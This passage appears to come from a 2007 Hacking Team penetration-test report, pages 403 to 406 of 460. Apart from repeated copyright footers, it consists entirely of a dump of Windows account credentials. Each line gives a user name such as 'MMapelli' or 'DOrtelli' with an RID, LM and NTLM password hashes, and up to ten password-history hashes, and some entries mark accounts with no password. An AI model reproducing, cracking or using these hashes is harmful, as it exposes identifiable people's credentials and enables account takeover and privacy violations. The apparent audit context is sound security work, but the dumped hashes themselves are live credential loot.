GManzullo_history_0:1161:C7D8012663B3C87D207BFFE50F1396D2:51EF5F182AA77D6D7D8325E1D90E3EC5:::
GManzullo_history_1:1161:52E870D4030DA95073251AA2B4314B90:C9ED6422AB01B31BE86651B7EE2D455D:::
GManzullo_history_2:1161:31BDB203FEDCD4A1D9DC460936142EF7:4A64B6A1E7143DE52196C99EEAF70582:::
GManzullo_history_3:1161:NO PASSWORD*********************:939646D1DA8F75C1106FE55749503B91:::
GManzullo_history_4:1161:AD28771C93637C7FAC509DFFC0988E77:9F4F9E67789D717A39D6FDFF6D0BC664:::
GManzullo_history_5:1161:685ABE63C509A0BE2A64681E85A61109:9EEE8C003E33E2E3A2A2AA966BBB4694:::
GManzullo_history_6:1161:21E9B403C6A39CC7E68AA26A841A86FA:05B845232449029ABCB484A28E848884:::
GManzullo_history_7:1161:8A76F37FA90BA3B8D71DCB21C80487D3:487DB28733CAEFE5B5481025DA28E308:::
GManzullo_history_8:1161:1A60C9B5199B70EA7C3113B4A1A5E3A0:734818F5A9A8B2A7032534BE2D658835:::
GManzullo_history_9:1161:D5412517EB9AA2B631F6C54FC1582BD0:EB87A5D16A2FFBC9877E671092C3A80F:::
GManzullo_history_10:1161:8BDF79E3BBD6BA6FEF632E44E2E1A6A0:2C8472C034B81D65A8637E55D1C93255:::
MMapelli:1162:88583F9C36DED2407A01665EB2EB6C14:415579BEAF4C736576A78187252B5EF5:::
MMapelli_history_0:1162:888389342D409E0B7A01665EB2EB6C14:B5F457D10903E52EDEC0BF446E765AE5:::
MMapelli_history_1:1162:0297510153F860E07A01665EB2EB6C14:BD30CFBC4A4D8066BEF73DE14F66912C:::
MMapelli_history_2:1162:F11BE6FC24D7F3FBB3A23F4730883E44:ACEE4E61C7AACEB6481ECCA81787C630:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 403 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
MMapelli_history_3:1162:E8F67787AEEAD3851170E0A48692C806:CBC534C770CC23535A9712BD272AE68A:::
MMapelli_history_4:1162:8ED565BB4FC92FB51170E0A48692C806:0B153F72F580E0544FA39D29984D257D:::
MMapelli_history_5:1162:8ED565BB4FC92FB51170E0A48692C806:0B153F72F580E0544FA39D29984D257D:::
MMapelli_history_6:1162:08BEFE6FEACDDBABB3A23F4730883E44:3C04A1BB7043E66FDE4EC037B7AE4102:::
MMapelli_history_7:1162:88583F9C36DED24034EFFCAF3B9E6C9C:AE40C1FA8F4E359CE0D097CB186786FB:::
MMapelli_history_8:1162:734CE7AB63AED921E68AA26A841A86FA:B15CF172FE5C17A5110EDB52C7774CE6:::
MMapelli_history_9:1162:DCBD2627566AAD1234EFFCAF3B9E6C9C:E3BDFDA27C5413F8C25DD99FD4E5324F:::
MMapelli_history_10:1162:888389342D409E0B34EFFCAF3B9E6C9C:4025B7569F0D6144523C37901FB5CCBE:::
DOrtelli:1163:C604525C9508FCD7C2265B23734E0DAC:E27979B5E3C3A73EF21D7AE8C121C2E3:::
DOrtelli_history_0:1163:CBFC840C62EEB7B136077A718CCDF409:A05C1A551C92981482B40DFBCABC5824:::
DOrtelli_history_1:1163:CBFC840C62EEB7B109752A3293831D17:6EF6D356D76FAC57A46B2DBF28D4EB8C:::
DOrtelli_history_2:1163:CBFC840C62EEB7B11D71060D896B7A46:C4C5503C22E7BBB5890795A99BB5F7EA:::
DOrtelli_history_3:1163:4AE86CE5DA52C03EC2265B23734E0DAC:5881674D1446F16A18E59202058C2F2B:::
DOrtelli_history_4:1163:C0A242879AA6958D1D71060D896B7A46:DF531D2D9F6E9D52A9E1A1F8AD4EE16D:::
DOrtelli_history_5:1163:B466A6D8728E81F07584248B8D2C9F9E:683621B3E0404CFB4AD761AE99F42DED:::
DOrtelli_history_6:1163:E50DF12BE7A642EC7584248B8D2C9F9E:E253E5AFF5C7E869D10EBB765EB31AF8:::
DOrtelli_history_7:1163:D4958975A6CC50447584248B8D2C9F9E:187756A4D5FA30ABFED1D18A1C2CC5AF:::
DOrtelli_history_8:1163:2D79750B6EA4FBC53EFDBE0C6057D816:A2BCE7D96DFF20DB04D503603C7AF935:::
DOrtelli_history_9:1163:7EF2C04F7669C9FD7584248B8D2C9F9E:85CC79626A2A7B9DF5548771F264A9A0:::
DOrtelli_history_10:1163:A7149D6828E32A781D71060D896B7A46:7E985DCEA5BEB95614653E17ABB0D2B9:::
SPellegrini:1164:8CC0D0EEBD3AE2EA18FCD526FB48A829:62438056C1F3A5D426E71F750A02BD57:::
SPellegrini_history_0:1164:9715A72F901078F87C6E65C65EED1CAA:A81BE554C634AD4397FC0E4DA532046C:::
SPellegrini_history_1:1164:E7A80367B072CABCB14FD58A657A9CA6:56B24C996A0038216D441AC9795BEF4C:::
SPellegrini_history_2:1164:156BDCDEEF568582C81667E9D738C5D9:20BEEEC2CA06C807FBAF85F0FE66627C:::
SPellegrini_history_3:1164:FEED4CB2D69F7CC2C81667E9D738C5D9:B5D0A84C4BEE9469FE529C2DA05BCF29:::
SPellegrini_history_4:1164:2336654D4FE4613EC81667E9D738C5D9:7A47088839CE8054AB78319BCF6BC72C:::
SPellegrini_history_5:1164:F11BE6FC24D7F3FBB14FD58A657A9CA6:F4D0D7F3BE9C99B85A71D26C300CDB30:::
SPellegrini_history_6:1164:E8F67787AEEAD38590E9F98AF48F17CF:B888997D60F477902D4AEC6FC1C9636F:::
SPellegrini_history_7:1164:08BEFE6FEACDDBABB14FD58A657A9CA6:DB8E26C5AC29EC5639D6163534340E2C:::
SPellegrini_history_8:1164:D7D42D1D8EB51113A645635EA83E9623:99F0E17AD01DEA0B222D979A77C0FD20:::
SPellegrini_history_9:1164:0FAF6094C3C45F15E68AA26A841A86FA:CA8AE289BE75BC5B8A1792D90C1351F2:::
SPellegrini_history_10:1164:D216BFFB1243E0C6C81667E9D738C5D9:46861BB5754CB65641C64BBEFB2924D3:::
FPozzi:1165:FC335C41267C972409752A3293831D17:6A218858D4FAE74D61BCC75614807290:::
FPozzi_history_0:1165:98CD4AC78A385D288EEFE33A7F9BEE0D:D455BE4F7C1A047C12D44895B2A3B432:::
FPozzi_history_1:1165:27110D99B53CB3553FF699ED08BF66E2:3690C2190FD8413DBB66D035BF90D040:::
FPozzi_history_2:1165:C01CDD8FF8668682256EAE20FBEEF3E5:54294D390DBC617059635B47DBC42EE2:::
FPozzi_history_3:1165:52D127453B624FB8FAAD601A94B34C14:E4E7EEECBE1EDC4DBFA20107C8649F13:::
FPozzi_history_4:1165:9BACA3D48CEB1C5CCBF8C0D0484C9DEB:0F398ADEC74F1BAA02F6477130442ACF:::
FPozzi_history_5:1165:84DDCAB84D4E530BB14FD58A657A9CA6:848F23A122BDE96A4B50C86DC3D7A79F:::
FPozzi_history_6:1165:C01CDD8FF86686829B815A8B4B00F93F:0CE942F1A089408F07DD984C1862D31F:::
FPozzi_history_7:1165:CF566D6797596A0E90E2D1C15670AD46:01FA843CF870A9EA396487A00169331B:::
FPozzi_history_8:1165:9E770F2512C8D0B68214198ADABD1496:F42657CC2AC69E4F276679DA0F0F2B9E:::
FPozzi_history_9:1165:B60EF0DFAB409E728EEFE33A7F9BEE0D:0373A01DECA740AE3736A0C016230B15:::
FPozzi_history_10:1165:D5BD23C8405386AB316E911BB32346D7:A629B49C95C758B771BF6A45F5C27DB7:::
BSimpkins:1166:A4E09F7F0B6CB71F8B6C8CEF896BB9C4:F1D90557D0AECE10F4AF2CA932E8EB71:::
BSimpkins_history_0:1166:A4E09F7F0B6CB71F7D8C849EF436394B:8C6B9351CB4626F5F1F5F63C9CE8C381:::
BSimpkins_history_1:1166:A4E09F7F0B6CB71F761A05C877136C32:CD481DA6C9BF46EB36AA6758AB9A29BB:::
BSimpkins_history_2:1166:A4E09F7F0B6CB71F415D7AEED42119CD:422552D119BBBDD8789C66A7520E7051:::
BSimpkins_history_3:1166:A4E09F7F0B6CB71FC84C56BB1E628B5C:A9D69B9F7EEFC4E0BFBA8EABC139F288:::
BSimpkins_history_4:1166:A4E09F7F0B6CB71FD726D458EDE25D2E:4266FFB65E5642604A12F004A76A1AB1:::
BSimpkins_history_5:1166:A4E09F7F0B6CB71F75A5561C054E7E18:92E25419D8012CBEB4DB722CA1F74A4E:::
BSimpkins_history_6:1166:A4E09F7F0B6CB71FA05101ABC0494349:1F8DDE16D4DDA956BF95A28A8A48E6C7:::
BSimpkins_history_7:1166:A4E09F7F0B6CB71F63170FBFE026E03C:2CE3C791C0859DB26DC3B832E3F44365:::
BSimpkins_history_8:1166:A4E09F7F0B6CB71FF6B2916ED66C5043:D740D2BB642522703B6BFC649F0DC3D4:::
BSimpkins_history_9:1166:A4E09F7F0B6CB71FCCFB0D74049A8757:B78FA6CDB0E34ED028AF6170264D986B:::
BSimpkins_history_10:1166:A4E09F7F0B6CB71F3AD7911B154B8E9E:F84186C21F321C18865099B58ABD66CD:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 404 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
FTorrelli:1167:EB0CAA566E1D865E83246419EED4289D:AA2BB503579B22834F3465405511E5AB:::
FTorrelli_history_0:1167:EB0CAA566E1D865EB006A0586F92E5D8:E6BEB9843AFB4648469F74B24625F466:::
FTorrelli_history_1:1167:EB0CAA566E1D865EB84270F26A14D787:622C03EE2A2AB0DFBB4304597A09CC89:::
FTorrelli_history_2:1167:EB0CAA566E1D865E291AA0BF0A1AECF2:F6F90F13468FC82950E85F69B6DE067F:::
FTorrelli_history_3:1167:EB0CAA566E1D865EF373B77A30E01F73:53E6F4AF1C006C1D1E38740A9412F486:::
FTorrelli_history_4:1167:EB0CAA566E1D865E1CDA7B8D219BB039:174F04AB6EF04B48D017058C0740E618:::
FTorrelli_history_5:1167:EB0CAA566E1D865E927D43F98234C24B:4A049EA5B2DC63F230D6595E66EFEC90:::
FTorrelli_history_6:1167:EB0CAA566E1D865E6C6CA8500803C72E:242DC73919329E9BC55056DC5B5BF366:::
FTorrelli_history_7:1167:EB0CAA566E1D865E3DE8EA5FF558F606:0FC1B2E44C869036A964E2D180689BC1:::
FTorrelli_history_8:1167:27B8208511D822AD00766D7AA68AB50E:C47A166B4093EE71496C2078154EF37C:::
FTorrelli_history_9:1167:27B8208511D822ADE4955DEB7450BA38:3FF2497567E82E8A907C41B03E028A3E:::
FTorrelli_history_10:1167:27B8208511D822AD81A9B90C9259B4F4:BD3452F8EE5AB1B7133E20BAC1DB20F5:::
DBertuccio:1168:BBC1AFCE0CA1E5EEAAF966491077C1C0:2E924D52BE604F86F1918CAF74188C56:::
SBorghesio:1169:298E783C833C9843E67FBE85175519C6:C41786CE8C75A1FC24B3EA0846E64BA1:::
SBorghesio_history_0:1169:6ACD55283D0E49827584248B8D2C9F9E:01AFFA4C7778E3AFEFF7C0394EED373B:::
SBorghesio_history_1:1169:298E783C833C9843A113E826BD9D1BCE:AB4FE6559777C8EADF40755970E31E2D:::
SBorghesio_history_2:1169:BF6055B589337675846231FF87D612D0:8BF3B38F9E404D298B5070F2ED463B95:::
SBorghesio_history_3:1169:2F12630AC614849BF4EAB8CDE385A168:5F0C4020B8773F7EAD89DFBC24896814:::
SBorghesio_history_4:1169:2F12630AC614849B614FFD691C57F016:0243CEA42AE35779DEFFBD284ED46412:::
SBorghesio_history_5:1169:2F12630AC614849B187BF8BBAE08C55C:9EF788AF6D0B3FFBC0AEB165DFF27124:::
SBorghesio_history_6:1169:BBC1AFCE0CA1E5EEAAF966491077C1C0:2E924D52BE604F86F1918CAF74188C56:::
SBorghesio_history_7:1169:2F12630AC614849B187BF8BBAE08C55C:9EF788AF6D0B3FFBC0AEB165DFF27124:::
SBorghesio_history_8:1169:2F12630AC614849BC2B9D3E8969935AB:6E32D2D1A4B4E14C34C7A51367DDE22A:::
SBorghesio_history_9:1169:2F12630AC614849B967B896E30A9E007:D6180B3DE5E108B6997BE24EEE98BE83:::
SBorghesio_history_10:1169:2F12630AC614849B1EC2260D26D336AF:E4410FF3A63DCC605C1274A50648B40E:::
PCambieri:1170:D3BDA14955FE82BC1289A08ABB33FE68:BD93D0DB1A10E1F45B69443459FED031:::
PCambieri_history_0:1170:D3BDA14955FE82BCCD69FB74BD84E221:28FDECDB618AD3CB4170908168D80CC3:::
PCambieri_history_1:1170:032D6F20DF6178E3B3A23F4730883E44:78D43125892E8341CA0AC11F177FB354:::
PCambieri_history_2:1170:032D6F20DF6178E3E0C6D85618C367A9:F76E0BF9100EF8B1205D8B537300C601:::
PCambieri_history_3:1170:B3B654CD884081BF358F4BE2BEFBCF0F:BBA178F70DB05D7326C0EF0E5CFA35A0:::
PCambieri_history_4:1170:B3B654CD884081BF735D87D49CCAE09F:45D008D7E127E24B6792E97AB3CB2C16:::
PCambieri_history_5:1170:B3B654CD884081BF8C8EE6FAAA52F518:AFF9DB9C9E7844DFB5BA3A5CDA574462:::
PCambieri_history_6:1170:B3B654CD884081BF66C55F596A18B9BC:5691B6AE6A166847CC0FC6ECDDD2EC46:::
PCambieri_history_7:1170:B3B654CD884081BF3F8C763451288DC1:7F1B452593D096D8A5A673ED230DE976:::
PCambieri_history_8:1170:B3B654CD884081BFF0B35FE160DC97B6:E21D2DB4F5F787303381404826BB1AAD:::
PCambieri_history_9:1170:B3B654CD884081BFBBE2206CAA95CF74:6CC29C32073B5AA37929841E6D39DC5B:::
PCambieri_history_10:1170:B3B654CD884081BF0D2A60377FEA94E3:2EABCD4D13421DC5E4E329EB01819026:::
VCasulli:1171:1ABBCDBEAC16054DB284AC15311101CA:BE68B8FF1433A3F4C68B8EE1395DF94F:::
VCasulli_history_0:1171:B2BC81831D9EA90398E498008D01846D:B2D76C13C25AD46E1CE9328537D492EC:::
VCasulli_history_1:1171:0C9317695090450CC46BC17DEB66DC07:532CBD8E0F2671D45E78B93DD6918845:::
VCasulli_history_2:1171:E946E50486DB7391C79845A985B69350:5D73315C6923FC7908C624B39074FF56:::
VCasulli_history_3:1171:BE5DB1FB96D83F4EC79845A985B69350:0E42098C274F4CABF4B5F9A446373804:::
VCasulli_history_4:1171:BE5DB1FB96D83F4EDD48C6A0489BD714:626375F914AFB6651270412036EF7CB7:::
VCasulli_history_5:1171:CDB29904DAAC8320925CA22CC9CD8696:28AF1142D0F475F3F699D5CA662D29C1:::
VCasulli_history_6:1171:312F9A022273C449EE47C9D36ECFC746:6D6C8FDCAA83527FFB8BAA2E9EF06D13:::
VCasulli_history_7:1171:F51D5C63DA1AF41FFF17365FAF1FFE89:4086547CBEBD3051631B81F7649CEF5E:::
VCasulli_history_8:1171:9C8D32DF89EA0FE6293A77E981A19F45:B7623211B3160B21BDE2C5D45C99B232:::
VCasulli_history_9:1171:84E9D6F5E255E9D748B5AECC7A8DCAD0:499CFDA8601B5873D2F21CF86C195438:::
VCasulli_history_10:1171:E096D2DC2C334E2883A50625DF6E3C23:2560B1B353D67F8711B38DE5ADC9C8FE:::
FCazzulini:1172:E87B00000D90453ACC921122BCF8E8C5:1C1650247A1685A43FEB58EEB19AD58D:::
FCazzulini_history_0:1172:E87B00000D90453A456AD24C7DC38EFD:3600E214F4DF60C92DCFE5430C0CFE8E:::
FCazzulini_history_1:1172:E87B00000D90453AD2E034EDDCA2023B:2E834E174A871F48C77D30A8877FC4A2:::
FCazzulini_history_2:1172:E87B00000D90453A093307DC03EEEF4C:221C4B20118799A49372E8D95833927E:::
FCazzulini_history_3:1172:E87B00000D90453A28175E1F85C3A81A:13C46A0B206EDED7CA21BDA738533FC4:::
FCazzulini_history_4:1172:E87B00000D90453A6EF6947F6DA87C6E:1545575110F332CC0282F73D1C0BD866:::
FCazzulini_history_5:1172:E87B00000D90453A900DE8B8F841AD22:DB559C39DCECBB5A339B06455C2A721B:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 405 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
FCazzulini_history_6:1172:E87B00000D90453A5E27F421CCEF2595:03044271DED6F006877A7A993CD7BFF9:::
FCazzulini_history_7:1172:E87B00000D90453A71C35710D794251A:E2882F9EAA61D5C6AA62355BB0C43FFB:::
FCazzulini_history_8:1172:E87B00000D90453A5F3B913C80597E91:BC54FF6A9F26A65C336CD6FF1C8760AD:::
FCazzulini_history_9:1172:E87B00000D90453A020FBBF4F801A047:044F5087F1144EAB04692EBE879D474B:::
FCazzulini_history_10:1172:E87B00000D90453A797B93301FB6F976:09104C658156FC11D0E0DB82D21CCBDA:::
HMaatugh:1173:0670B007E6E8D298BF98388FC2D664E9:DE49B906D85714AAE6CED7F4DFC27951:::
HMaatugh_history_0:1173:1153578810D976A120F13F08557E5DD2:B6721E78BF1939499843F02657658908:::
HMaatugh_history_1:1173:FE0A7878110B9CFC0F08CC42B4387231:CBA3953823011946862093708A5DC162:::
HMaatugh_history_2:1173:3F382C7BCDB4618B5C152762FF091A3D:C43A0AB74BF4D2F89788181D0F4BA9C9:::
HMaatugh_history_3:1173:6ACB9E3CC5AAA2CC695109AB020E401C:2FE52846387B66F9DEB8D562DBF87C7C:::
HMaatugh_history_4:1173:9F4221BA4A4B9707695109AB020E401C:41E6C545F3C1E7E0FC5D7EC3E981FB3C:::
HMaatugh_history_5:1173:4B40E0951CFCCADF985C37F1923EEF11:52947255B5E6AF2CCA7F6A66F457A3D3:::
HMaatugh_history_6:1173:2F4E8286F696D0BCFB6D151C60DBD95F:6356EE492DE1896E565CF64E240F7B17:::
HMaatugh_history_7:1173:1CD804704D4750B99A0F5D12D8F612D0:1069B993EF4B85A727F308D99C30E1C9:::
HMaatugh_history_8:1173:A9B6510B3772954A816DEBED21A001D4:DE4749CBBFE7AE833310641DD0F4DA35:::
HMaatugh_history_9:1173:127153042E2355CB25AD3B83FA6627C7:E67812461AC64F39428C1E7C90C2152E:::
HMaatugh_history_10:1173:B1A9A1301CD7AEA9F856A19C02970C84:B7EC34A3C149A62A1C96022CA720D415:::
SMantovani:1174:A282ED7C701D9D61EA5BD2A92005068C:E420CA54A2BD77ACFC299E3D6BD7C1EB:::
SMantovani_history_0:1174:715055C448F5782268D31C2AEF56AA30:505C336C84807971026A424D6BFF3B46:::
SMantovani_history_1:1174:E1CB15537E0E739A1FA73AE7450B0033:583B47BABC2B73C1AAB4523A2B0273BD:::
SMantovani_history_2:1174:C80D812E6F011CB031A60ABC6B5DA940:9940DA10E82D9072482099B4930CEAC3:::
SMantovani_history_3:1174:F11BE6FC24D7F3FB7C00CF191F9EDF0D:DBD51C20C612C29D5AC5D1D474D3A28A:::
SMantovani_history_4:1174:61CB73542432211C38F10713B629B565:5470A0A33FA861D16A1518906FEDFC26:::
SMantovani_history_5:1174:97AEEAF4385604780C861EE54C2A5003:F86DACFEE56EBEB32A998363959E0C2D:::
SMantovani_history_6:1174:8AA4FAB6430DAF8C1FA73AE7450B0033:B45B07220F26AB5BDC1CA71CCADC3D42:::
SMantovani_history_7:1174:8AA4FAB6430DAF8C1FA73AE7450B0033:B45B07220F26AB5BDC1CA71CCADC3D42:::
SMantovani_history_8:1174:D7D42D1D8EB511132B614F46854E9358:56F48D58DDA1932D42C07D682E4E1937:::
SMantovani_history_9:1174:299845DB7F874AAF695109AB020E401C:08C1DFDFDCA6CC08A696D25B430D948E:::
SMantovani_history_10:1174:DDDBE56C47CD4C06E68AA26A841A86FA:DF7BEDB4ACF15DD5FC0928E943AEA5C6:::
SMarchetti:1175:88583F9C36DED2407A01665EB2EB6C14:415579BEAF4C736576A78187252B5EF5:::
SMarchetti_history_0:1175:DCBD2627566AAD127A01665EB2EB6C14:F8E0998200670583D5A5D51ACEBBE42B:::
SMarchetti_history_1:1175:888389342D409E0B7A01665EB2EB6C14:B5F457D10903E52EDEC0BF446E765AE5:::
SMarchetti_history_2:1175:0297510153F860E07A01665EB2EB6C14:BD30CFBC4A4D8066BEF73DE14F66912C:::
SMarchetti_history_3:1175:3F49381F8A31399618FCD526FB48A829:145EEC152DC1997405E161B0B6FF3055:::
SMarchetti_history_4:1175:2804A835FF9C7F59E7D403AAFB5E00F6:275D2AEAFD5112320815A75CFFD35004:::
SMarchetti_history_5:1175:F11BE6FC24D7F3FB7C00CF191F9EDF0D:DBD51C20C612C29D5AC5D1D474D3A28A:::
SMarchetti_history_6:1175:E8F67787AEEAD3851170E0A48692C806:CBC534C770CC23535A9712BD272AE68A:::
SMarchetti_history_7:1175:8ED565BB4FC92FB51170E0A48692C806:0B153F72F580E0544FA39D29984D257D:::
SMarchetti_history_8:1175:08BEFE6FEACDDBABB3A23F4730883E44:3C04A1BB7043E66FDE4EC037B7AE4102:::
SMarchetti_history_9:1175:D7D42D1D8EB51113743C544636BCAF48:EB1A9CDB7E857F3DDE78A4E2B407A96A:::
SMarchetti_history_10:1175:E06A4C0452F1583934EFFCAF3B9E6C9C:9F86E85D40654F90E26DEF1B19060221:::
DMasella:1176:C0E39756DFB8AAE118FCD526FB48A829:062FC1E9AE8CF4471A4E6C3817EFF01C:::
DMasella_history_0:1176:D23FEEDFAE8A820118FCD526FB48A829:C1FFA41391B1F58D59C73C6FB2F6B3AC:::
DMasella_history_1:1176:6B37241884F43D7118FCD526FB48A829:9B86260D1D814C1091CD5932B75C0179:::
DMasella_history_2:1176:A3C9F8C4CC26D18D18FCD526FB48A829:4EB4A9FE89961A031E6B490CB183287D:::
DMasella_history_3:1176:0BBB07A57F8559D1B14FD58A657A9CA6:5A1880E4A55C4FCE15D4A46CE7C7B9EF:::
DMasella_history_4:1176:2892CCF4CB3AEE90B14FD58A657A9CA6:2B06612BAF8A7D5DB181C412C93F14BE:::
DMasella_history_5:1176:00C7BAF55A04F014F20A061CE79F69A0:1EBCDE1837DE533385923B7143A7256D:::
DMasella_history_6:1176:C0E39756DFB8AAE1B14FD58A657A9CA6:97716F48A1ADAA7754DC4600C8E45E45:::
DMasella_history_7:1176:A209BCEA832F4591B14FD58A657A9CA6:D5E2F4F8D6D481B3D6B232D7024DA4A3:::
DMasella_history_8:1176:6B37241884F43D71B14FD58A657A9CA6:994267D8B3146DDF7896865678FC8332:::
DMasella_history_9:1176:A3C9F8C4CC26D18DB14FD58A657A9CA6:265256372961D87D26DA95778ED189B3:::
DMasella_history_10:1176:D752CC5C4C051C99B14FD58A657A9CA6:BBCAB9EFF5566165FFBEDED8E4B760C8:::
CMastrota:1177:597E3C340AD527BEAF84D1BB761ED383:EC406132AA2BF333B3B62B54D39E9D0E:::
CMastrota_history_0:1177:597E3C340AD527BE8347BB1E72CC9F76:78C7B3C119C1E6F145743C64285C7313:::
CMastrota_history_1:1177:597E3C340AD527BEF16A0858F40109DB:CAE27D8834A250FF70BF1874EB1BBE1B:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 406 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
CMastrota_history_2:1177:597E3C340AD527BEDD48C6A0489BD714:581E225849E7448880391633DD7169F5:::
CMastrota_history_3:1177:597E3C340AD527BEC79845A985B69350:1ABB00D4844899896476A7345A03F608:::
CMastrota_history_4:1177:597E3C340AD527BE120758FBF9E8A7F8:9BF4E3F51C069780B2913E06E50228EA:::
CMastrota_history_5:1177:597E3C340AD527BE2C5AE1F1CFB9210F:618DA2608480D087B9BD24654810CF8E:::
CMastrota_history_6:1177:597E3C340AD527BE4207FD0DF35A59A8:C2BC79A5B60CDB0B0F97E3FE6EDAD9E9:::
CMastrota_history_7:1177:597E3C340AD527BE5D3872C04445E010:0BB1E245F0F8C8BFF3DE4042EBABB638:::
CMastrota_history_8:1177:597E3C340AD527BE6D3A627C824F029F:B71F70ED88CA639F645A839FEBF833E1:::
CMastrota_history_9:1177:597E3C340AD527BE09752A3293831D17:0598FCB4ACA78E8C06262196A7BBE6DC:::
CMastrota_history_10:1177:597E3C340AD527BE36077A718CCDF409:5507C5CEC7A89A9B431BEA7AD1581639:::
ANeagu:1178:5013E51FFF0C5FA0056F98F96B2CEEBA:A74C72C42B8311E4802C5D5279EE1667:::
ANeagu_history_0:1178:A911D65E101F69D2417EAF50CFAC29C3:8BD4AE0E8B35437E0084BD9600E7A774:::
ANeagu_history_1:1178:49C5D3D85F8A2463B0D3662B97EBED58:91C49CF0C75B4623C89619280F063B94:::
ANeagu_history_2:1178:7605D02101E1A0EA2E14B0C3D0ABB70C:AC1499858B75CBCB2BDB6F8885DE984D:::
ANeagu_history_3:1178:E946E50486DB7391C79845A985B69350:5D73315C6923FC7908C624B39074FF56:::
ANeagu_history_4:1178:A7FDD455F0FD45CBAF4788374C58B713:FCD6399C33B5D8276DB57B41CB7B5A81:::
ANeagu_history_5:1178:NO PASSWORD*********************:334D4FE630B234E79DD354FAB702FB22:::
ANeagu_history_6:1178:2D62EBB5E56BF6D61486235A2333E4D2:7C8CF5BF03E5D7D0D0CBC7C0CBC87928:::
ANeagu_history_7:1178:6288E1FAE7BE59A7F8C265D77EB56E64:38D25FF9F663FB59F2529314E25F3D2D:::
ANeagu_history_8:1178:E7EC0D5F3BC7A9612F6646B128A5EC83:109052F98C4946C898689F6BE3CC4DE1:::
ANeagu_history_9:1178:BBC1AFCE0CA1E5EEAAF966491077C1C0:2E924D52BE604F86F1918CAF74188C56:::
ANeagu_history_10:1178:BBC1AFCE0CA1E5EEAAF966491077C1C0:2E924D52BE604F86F1918CAF74188C56:::
LPelizzola:1179:2A54B1661D34249AC79845A985B69350:D1FCA5B2E759F77ABA4183AFE30FA996:::
LPelizzola_history_0:1179:2A54B1661D34249A120758FBF9E8A7F8:F9E05DD186BAE9212C5F8102C2EA4150:::
LPelizzola_history_1:1179:2A54B1661D34249A2C5AE1F1CFB9210F:585A63456D13A07635C2FD4C4F7723CF:::
LPelizzola_history_2:1179:2A54B1661D34249A4207FD0DF35A59A8:8F1B6470BAA7C7B969C8812E0C04EE4A:::
LPelizzola_history_3:1179:2A54B1661D34249A5D3872C04445E010:D7DA19BDD86313C94453BAFC00473A3B:::
LPelizzola_history_4:1179:2A54B1661D34249A6D3A627C824F029F:E18DD8AA21DE8F3C248CD3B5527EF8E7:::
LPelizzola_history_5:1179:2A54B1661D34249A1AA818381E4E281B:292FBA7911B2F473430E5CBAAAA887B3:::
LPelizzola_history_6:1179:2A54B1661D34249A1D71060D896B7A46:F64593857E1D2D080921EF1990EC4633:::
LPelizzola_history_7:1179:2A54B1661D34249AC2265B23734E0DAC:2A0D4A291CB4F1BF984FC5B46B97A5A4:::
LPelizzola_history_8:1179:2A54B1661D34249A09752A3293831D17:39EAFE066B9A0CAC21FDC85B58FA3A00:::
LPelizzola_history_9:1179:2A54B1661D34249A36077A718CCDF409:4D860052D1F88280B9AA223DF7C82953:::
LPelizzola_history_10:1179:2A54B1661D34249A7C3113B4A1A5E3A0:93BC654365E664CE4E29F0CAAFB8A515:::
PSanta:1180:8AEA3639B175771AAD9A498B70EF4BD4:CF7771624C9570DED4DA0FFB4781C2BC:::
PSanta_history_0:1180:8AEA3639B175771A199104C377624674:0CC16D6356D6160E60A018E35BB30615:::
PSanta_history_1:1180:8AEA3639B175771AEE9F5BE9EB16E31F:0DA49F13644DC79C1CA3BFBAF7F5954F:::
PSanta_history_2:1180:8AEA3639B175771AAB6B2369CA5E4FFE:A8B39B294575C366313D1D0784208852:::
PSanta_history_3:1180:8AEA3639B175771A096B952A55EB06D6:DA8850BEB4AD20280763F02447B239A5:::
PSanta_history_4:1180:8AEA3639B175771A094F0950963E0C4E:3E30BEF0663BF16B5AC971DDADCAA1C6:::
PSanta_history_5:1180:8AEA3639B175771A3D2A182EE4352D38:BAC48A234D7B90B726074EC52716EFCD:::
PSanta_history_6:1180:8AEA3639B175771A16572EDE84216DD9:3EA0C47EF1EB7A12D5EEFABEA749AD39:::
PSanta_history_7:1180:8AEA3639B175771AFA7C1BBD9A593B7A:4EF9C8A9FE6C19BD16F4947F502537C0:::
PSanta_history_8:1180:8AEA3639B175771AEE2984AA7605E81C:804C73D998A092796EDDEDFB48A5EBB9:::
PSanta_history_9:1180:8AEA3639B175771A2E06C6DBC466602E:6B8A05F65622804A654C86E76071DD57:::
PSanta_history_10:1180:8AEA3639B175771A4C56EFD531E400CB:C67F5F3E1A55E97A5A9E005B7B080D07:::
MSavoia:1181:88583F9C36DED2407A01665EB2EB6C14:415579BEAF4C736576A78187252B5EF5:::
MSavoia_history_0:1181:888389342D409E0B7A01665EB2EB6C14:B5F457D10903E52EDEC0BF446E765AE5:::
MSavoia_history_1:1181:3F49381F8A31399618FCD526FB48A829:145EEC152DC1997405E161B0B6FF3055:::
MSavoia_history_2:1181:F11BE6FC24D7F3FB18FCD526FB48A829:1ED9E991233B6BB4CC5A6832FDF0312F:::
MSavoia_history_3:1181:E8F67787AEEAD38590E9F98AF48F17CF:B888997D60F477902D4AEC6FC1C9636F:::
MSavoia_history_4:1181:08BEFE6FEACDDBABB14FD58A657A9CA6:DB8E26C5AC29EC5639D6163534340E2C:::
MSavoia_history_5:1181:3A07FAF2DEDDDC93C81667E9D738C5D9:3E4CE51D27CDB55964EB69B01A3237B3:::
MSavoia_history_6:1181:6819AAB67F4AA005C81667E9D738C5D9:5DB6BA4E8A5D6D3B30B339FD94602A93:::
MSavoia_history_7:1181:2336654D4FE4613EC81667E9D738C5D9:7A47088839CE8054AB78319BCF6BC72C:::
